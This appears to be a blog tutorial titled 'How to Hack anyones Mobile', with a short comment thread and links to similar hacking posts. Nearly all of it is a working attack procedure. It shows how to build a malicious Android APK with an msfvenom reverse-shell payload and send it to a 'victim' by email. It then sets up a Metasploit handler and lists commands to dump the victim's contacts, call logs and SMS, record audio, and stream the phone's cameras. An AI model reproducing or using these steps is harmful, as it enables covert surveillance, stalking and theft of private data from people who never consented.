How to Hack anyones Mobile ?

"Most people associate hacking with breaking the law and assume that everyone who engages in hacking activities is a criminal. Granted, there are people out there who use hacking techniques to break the law, but hacking isn't really about that. In fact , hacking is more about following the law than breaking it. The essense of hacking is finding unintended or overlooked uses for the laws and properties of a given situation and then applying them in new and inventive way to solve a problem - whatever it might be"

 ...... By Jon Erickson.


So Welcome to TekTuts,
in this post I am going to share with you step by step tutorial to hack anyones mobiles


Step By Step Guide:
  1. Start Kali Linux 
  2. Open Terminal (Press Ctrl +Alt+T)
  3. Type sudo -i  to give it root user privilage.
  4. Then enter your password.
  5. Then type ifconfig to get your ip addresss.
  6. copy your ip address which will be shown in wlan0 part and in front of inet . Copy by selecting and then pressing (Ctrl + Shift + C).
  7. Now start msfconsole by typing msfconsole . It will take time.
  8. Now it will show msf command prompt.
  9. Type msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip_address(press Ctrl+Shift+V) LPORT=4444 R > Hack.apk
  10. This will generate payload which will be saved in root directory . So open file explorer and Go to Other Locations and then Computer and search for Hack.apk
  11. Now copy this Hack.apk file and send it to your victim through gmail or any other route.
  12. Now we need to handle victim . So start handler by typing  use exploit/multi/handler
  13. Now it will show exploit handler prompt.
  14. type set payload android/meterpreter/reverse_tcp
  15. the type set LHOST your_ip_address(press Ctrl+Shift+V)
  16. next type set LPORT 4444
  17. Now all settings are set , we need to start exploit and wait for victim to install apk in their phone.
  18. type exploit.
  19. and wait until it says session opened.
  20. Now we have Hacked victims mobile . So now We can access anything from their mobile.
  21. Type dump_contacts to get contacts from their mobile. Contacts will be dumped in text file.
  22. type dump_calllog  to get their call history . This will also be saved in another text file.
  23. type dump_sms to get sms history. It will also be saved in another text file.
  24. you can record audio by typing record_mic
  25. type webcam_list to see list of cameras.
  26. type ipconfig or ifconfig to get list of all interfaces i.e. ip address and all.
  27. type check_root to check whether device is rooted or not.
  28. type ps  to see processes running.
  29. type sysinfo to get information of victim system.
  30. type webcam_snap to take snap from their mobile.
  31. we can also specify , which camera to use.
  32. for using front camera type webcam_snap -i 1
  33.  and to use rear camera type webcam_snap -i 2
  34. We can even change quality of snap by appending -q  followed by  100
  35. We can even start live stream from their camera.
  36. type webcam_stream -i 2 -q 100 to use rear camera and if you want to use front then change 2 to 1
  37. Now it will be streaming video on site location of which is shown in terminal as .html extension.
  38. Double click on html file which will redirect you to the browser. Where video is streaming.
  39. You can get into sdcard i.e. memory by typing shell .
  40. .type exit to exit from sdcard.
  41. type help to get list of all commads.
  42. Then you can navigate in sdcard by using following commands.
  • type ls  to list down all files and directory.
  • type cd followed by name of directory to change current working directory.
  • type pwd to print current working directory.
  • to see text inside any text file we can type cat  follwed by text file.
  • cd - to change directory to previous directory.
  • cd / to change directory to home directory.


Thanks buddy for Reading .
#TekTuts


If you want you can even watch video by TekTuts to hack anyones mobiles ,link of which is provided below .



Comments

  1. Hey TekTuts , I have doubt , What is Kali ?

    ReplyDelete
    Replies
    1. Kali is Debian based Linux distro (i.e Linux based Operating System) . Which is used for penetrating testing and hacking, programming . it has most of the tools installed for these operations.

      Delete

Post a Comment

Popular posts from this blog

Hack WhatsApp Accounts Easy – Whatsapp Hack Online 2017

How to hack a kik account

Real way to earn money online